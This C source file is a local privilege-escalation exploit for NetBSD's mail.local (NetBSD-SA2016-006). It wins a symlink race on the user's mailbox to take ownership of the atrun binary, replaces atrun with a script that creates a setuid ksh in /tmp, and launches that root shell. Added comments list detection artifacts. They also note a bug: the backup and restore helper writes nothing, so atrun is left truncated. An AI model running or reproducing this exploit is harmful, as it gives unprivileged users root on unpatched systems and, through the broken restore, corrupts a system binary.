
// Source: http://akat1.pl/?id=2
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <signal.h>
#include <stdlib.h>
#include <string.h>
#include <err.h>
#include <sys/wait.h>
#define ATRUNPATH "/usr/libexec/atrun"
#define MAILDIR "/var/mail"
/*
 * Replace the atrun(8) binary at ATRUNPATH with the three-line shell
 * script held in `script` (it copies /bin/ksh to /tmp/ksh and marks the
 * copy setuid).  main() only calls this after its race loop has seen
 * ATRUNPATH owned by the caller's uid and after chmod(ATRUNPATH, 0755);
 * without that the fopen(..., "wb") below fails and -1 is returned.
 *
 * Returns 0 when the whole script was written and the stream closed
 * cleanly, -1 on any fopen/fwrite/fclose failure.
 *
 * Defender note: the artifacts this leaves are a shell script (not an
 * ELF binary) at ATRUNPATH, a change of that file's owner and mode, and a
 * setuid copy of ksh in /tmp — all of which file-integrity monitoring on
 * /usr/libexec and setuid-file sweeps of /tmp will surface.
 */
static int
overwrite_atrun(void)
{
	char *script = "#! /bin/sh\n"
	    "cp /bin/ksh /tmp/ksh\n"
	    "chmod +s /tmp/ksh\n";
	size_t size;
	FILE *fh;
	int rv = 0;

	/* "wb" truncates; requires write permission on ATRUNPATH. */
	fh = fopen(ATRUNPATH, "wb");

	if (fh == NULL) {
		rv = -1;
		goto out;
	}

	/* Short write counts as failure. */
	size = strlen(script);
	if (size != fwrite(script, 1, strlen(script), fh)) {
		rv = -1;
		goto out;
	}

out:
	/* fclose() flushes, so its result matters for a write stream. */
	if (fh != NULL && fclose(fh) != 0)
		rv = -1;

	return rv;
}
|
|
|
|
/*
 * Copy the contents of `from` to `dest`, 1 KiB at a time.
 *
 * create != 0: `dest` is created with O_WRONLY|O_EXCL|O_CREAT and mode
 *              0600, so an already-existing file (or a symlink planted at
 *              that path) makes the open fail rather than being followed
 *              or truncated.
 * create == 0: `dest` is opened with fopen(..., "wb"), which truncates
 *              and follows symlinks.
 *
 * Returns 0 on success, -1 if the source or destination could not be
 * opened, a write was rejected, or either fclose() failed.
 *
 * NOTE(review): as written, the fwrite() in the loop targets `in` (the
 * read-only source stream) and the loop only bails out when that
 * fwrite() returns a non-zero count, so no data is ever written to
 * `dest`; every "backup" and "restore" done through this helper in
 * main() yields an empty file.  For an incident responder this means the
 * original atrun(8) is left truncated, not restored, after the program
 * has run.  Also, if fdopen() fails in the create path, `fd` is not
 * closed before returning.
 */
static int
copy_file(const char *from, const char *dest, int create)
{
	char buf[1024];
	FILE *in = NULL, *out = NULL;
	size_t size;
	int rv = 0, fd;

	in = fopen(from, "rb");
	if (create == 0)
		out = fopen(dest, "wb");
	else {
		/* O_EXCL: refuse to reuse or follow an existing path. */
		fd = open(dest, O_WRONLY | O_EXCL | O_CREAT, S_IRUSR |
		    S_IWUSR);
		if (fd == -1) {
			rv = -1;
			goto out;
		}
		out = fdopen(fd, "wb");
	}

	/* Both streams are checked only here, after the create branch. */
	if (in == NULL || out == NULL) {
		rv = -1;
		goto out;
	}

	while ((size = fread(&buf, 1, sizeof(buf), in)) > 0) {
		/* Writes to `in`, not `out`; see NOTE(review) above. */
		if (fwrite(&buf, 1, size, in) != 0) {
			rv = -1;
			goto out;
		}
	}

out:
	if (in != NULL && fclose(in) != 0)
		rv = -1;
	if (out != NULL && fclose(out) != 0)
		rv = -1;

	return rv;
}
|
|
|
|
/*
 * Entry point: local privilege escalation through mail.local(8)
 * (NetBSD-SA2016-006).
 *
 * Flow, as the code below shows it:
 *   1. back up MAILDIR/<login> (if present) and ATRUNPATH into /tmp via
 *      copy_file();
 *   2. fork: the child runs mail.local for <login> in a loop, while the
 *      parent keeps swapping the mailbox path between a symlink to
 *      ATRUNPATH and a fresh regular file, until lstat() reports
 *      ATRUNPATH owned by the caller's uid;
 *   3. chmod ATRUNPATH to 0755, overwrite it via overwrite_atrun(), poll
 *      until /tmp/ksh exists, restore ATRUNPATH from the backup, chmod it
 *      back to 0555 and exec the setuid shell.
 *
 * Mitigation is the vendor fix for mail.local.  The observable artifacts
 * — the user's mailbox alternating between symlink and regular file,
 * ownership/mode changes on ATRUNPATH, /tmp/atrun, /tmp/<login> and a
 * setuid /tmp/ksh — are what a detection rule or responder should look
 * for.
 *
 * Portability notes: struct stat, lstat(), chmod() and umask() come from
 * <sys/stat.h>, which this file does not include directly; asprintf()
 * results are checked through the output pointer rather than the return
 * value; execl()'s terminating NULL is not cast to (char *).
 */
int
main()
{
	pid_t pid;
	uid_t uid;
	struct stat sb;
	char *login, *mailbox, *mailbox_backup = NULL, *atrun_backup, *buf;

	/* Backups created below under /tmp are therefore 0600. */
	umask(0077);

	login = getlogin();

	if (login == NULL)
		err(EXIT_FAILURE, "who are you?");

	uid = getuid();

	asprintf(&mailbox, MAILDIR "/%s", login);

	if (mailbox == NULL)
		err(EXIT_FAILURE, NULL);

	/* Only back the mailbox up if it exists; otherwise backup stays NULL. */
	if (access(mailbox, F_OK) != -1) {
		/* backup mailbox */
		asprintf(&mailbox_backup, "/tmp/%s", login);
		if (mailbox_backup == NULL)
			err(EXIT_FAILURE, NULL);
	}

	if (mailbox_backup != NULL) {
		fprintf(stderr, "[+] backup mailbox %s to %s\n", mailbox,
		    mailbox_backup);

		/* create=1: fails if /tmp/<login> already exists. */
		if (copy_file(mailbox, mailbox_backup, 1))
			err(EXIT_FAILURE, "[-] failed");
	}

	/* backup atrun(1) */
	atrun_backup = strdup("/tmp/atrun");
	if (atrun_backup == NULL)
		err(EXIT_FAILURE, NULL);

	fprintf(stderr, "[+] backup atrun(1) %s to %s\n", ATRUNPATH,
	    atrun_backup);

	if (copy_file(ATRUNPATH, atrun_backup, 1))
		err(EXIT_FAILURE, "[-] failed");

	/* win the race */
	fprintf(stderr, "[+] try to steal %s file\n", ATRUNPATH);

	switch (pid = fork()) {
	case -1:
		err(EXIT_FAILURE, NULL);
		/* NOTREACHED */

	case 0:
		/*
		 * Child: drive mail.local for <login> forever; it is
		 * stopped by kill() from the parent.  `buf` is not checked
		 * for NULL before use.
		 */
		asprintf(&buf, "echo x | /usr/libexec/mail.local -f xxx %s "
		    "2> /dev/null", login);

		for(;;)
			system(buf);
		/* NOTREACHED */

	default:
		/* Parent: reason for switching to 0022 here is not stated. */
		umask(0022);
		for(;;) {
			int fd;
			/* Phase A: mailbox path is a symlink to ATRUNPATH. */
			unlink(mailbox);
			symlink(ATRUNPATH, mailbox);
			sync();
			/*
			 * Phase B: mailbox path is a plain file again.  No
			 * access mode flag is given, so on typical systems
			 * this is O_RDONLY|O_CREAT; fd is closed at once.
			 */
			unlink(mailbox);
			fd = open(mailbox, O_CREAT, S_IRUSR | S_IWUSR);
			close(fd);
			sync();
			/* Exit condition: ATRUNPATH now owned by our uid. */
			if (lstat(ATRUNPATH, &sb) == 0) {
				if (sb.st_uid == uid) {
					kill(pid, 9);
					fprintf(stderr, "[+] won race!\n");
					break;
				}
			}
		}
		break;
	}
	(void)waitpid(pid, NULL, 0);

	if (mailbox_backup != NULL) {
		/* restore mailbox */
		fprintf(stderr, "[+] restore mailbox %s to %s\n",
		    mailbox_backup, mailbox);

		/* create=0: fopen "wb" truncates the current mailbox. */
		if (copy_file(mailbox_backup, mailbox, 0))
			err(EXIT_FAILURE, "[-] failed");
		if (unlink(mailbox_backup) != 0)
			err(EXIT_FAILURE, "[-] failed");
	}

	/* overwrite atrun */
	fprintf(stderr, "[+] overwriting atrun(1)\n");

	/* Needs ownership of ATRUNPATH, which the loop above waited for. */
	if (chmod(ATRUNPATH, 0755) != 0)
		err(EXIT_FAILURE, NULL);

	if (overwrite_atrun())
		err(EXIT_FAILURE, NULL);

	fprintf(stderr, "[+] waiting for atrun(1) execution...\n");

	/* Poll once a second until the script's side effect appears. */
	for(;;sleep(1)) {
		if (access("/tmp/ksh", F_OK) != -1)
			break;
	}

	/* restore atrun */
	fprintf(stderr, "[+] restore atrun(1) %s to %s\n", atrun_backup,
	    ATRUNPATH);

	if (copy_file(atrun_backup, ATRUNPATH, 0))
		err(EXIT_FAILURE, "[-] failed");
	if (unlink(atrun_backup) != 0)
		err(EXIT_FAILURE, "[-] failed");

	/* Mode is put back; ownership is not (see the message below). */
	if (chmod(ATRUNPATH, 0555) != 0)
		err(EXIT_FAILURE, NULL);

	fprintf(stderr, "[+] done! Don't forget to change atrun(1) "
	    "ownership.\n");
	fprintf(stderr, "Enjoy your shell:\n");

	/* Replaces this process; `return 0` is reached only if execl fails. */
	execl("/tmp/ksh", "ksh", NULL);

	return 0;
}